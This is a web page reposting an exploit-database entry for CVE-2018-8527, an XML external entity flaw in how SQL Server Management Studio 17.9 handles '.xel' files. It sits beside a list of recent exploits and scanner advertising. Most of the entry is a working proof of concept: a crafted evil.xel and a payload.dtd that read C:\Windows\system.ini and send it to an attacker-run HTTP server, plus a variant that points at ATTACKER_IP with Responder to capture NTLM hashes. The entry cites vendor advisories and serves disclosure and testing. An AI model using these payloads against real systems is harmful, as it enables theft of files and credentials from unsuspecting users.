microsoft sql server management studio 17.9 .xel xml external entity injection

▸▸▸ Exploit & Vulnerability >> local exploit & windows vulnerability

Online Vulnerability Scanner Tools

Code...

				
# Exploit Title: Microsoft SQL Server Management Studio 17.9 - '.xel' XML External Entity Injection
# Date: 2018-10-10
# Author: John Page (aka hyp3rlinx)	
# Website: hyp3rlinx.altervista.org
# Venodor: www.microsoft.com
# Software: SQL Server Management Studio 17.9 and SQL Server Management Studio 18.0 (Preview 4)	
# CVE: CVE-2018-8527
# References:
# http://hyp3rlinx.altervista.org/advisories/MICROSOFT-SQL-SERVER-MGMT-STUDIO-XEL-FILETYPE-XML-INJECTION-CVE-2018-8527.txt
# https://www.zerodayinitiative.com/advisories/ZDI-18-1131/
# https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8527
# The author was credited by the vendor (https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8527) 

# Description
# This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations 
# of Microsoft SQL Server Management Studio. User interaction is required to exploit this vulnerability 
# in that the target must visit a malicious page or open a malicious file.
# The specific flaw exists within the handling of XEL files. Due to the improper restriction 
# of XML External Entity (XXE) references, a specially crafted document specifying a URI causes the XML parser 
# to access the URI and embed the contents back into the XML document for further processing. An attacker 
# can leverage this vulnerability to disclose information in the context of the current process.

# [Exploit/POC]

python -m SimpleHTTPServer (listens Port 8000)

"evil.xel" (Extended Event Log File)

<?xml version="1.0"?>
<!DOCTYPE flavios [ 
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

"payload.dtd"

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;

# OR 
# Steal NTLM hashes
# Kali linux

/usr/share/responder/tools

responder -I eth0 -rv

"evil.xel"

<?xml version="1.0"?>
<!DOCTYPE dirty0tis [ 
<!ENTITY % dtd SYSTEM "\\ATTACKER_IP\unknown">
%dtd;]>

Result: Forced authentication and NTLM hash captured

Microsoft sql server management studio 17.9 .xel xml external entity injection Vulnerability / Exploit Source : Microsoft sql server management studio 17.9 .xel xml external entity injection

Last Vulnerability or Exploits

▸ gitlab 14.9 - stored cross-site scripting (xss) ◂

Discovered: 2022-04-26
Exploit: webapps
Vulnerability: ruby

▸ gitlab 14.9 - authentication bypass ◂

Discovered: 2022-04-26
Exploit: webapps
Vulnerability: ruby

▸ easeus data recovery - 'ensserver.exe' unquoted service path ◂

Discovered: 2022-04-19
Exploit: local
Vulnerability: windows

▸ ptpublisher v2.3.4 - unquoted service path ◂

Discovered: 2022-04-19
Exploit: local
Vulnerability: windows

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Discover posible vulnerabilities before GO LIVE with your project
Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Do an audit to find and close the high risk issues before having a real damage and increase the costs
Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Bypass your network restrictions and scan from our IP for relevant results
Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Scan your website from any device with internet connection

Tusted by

Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.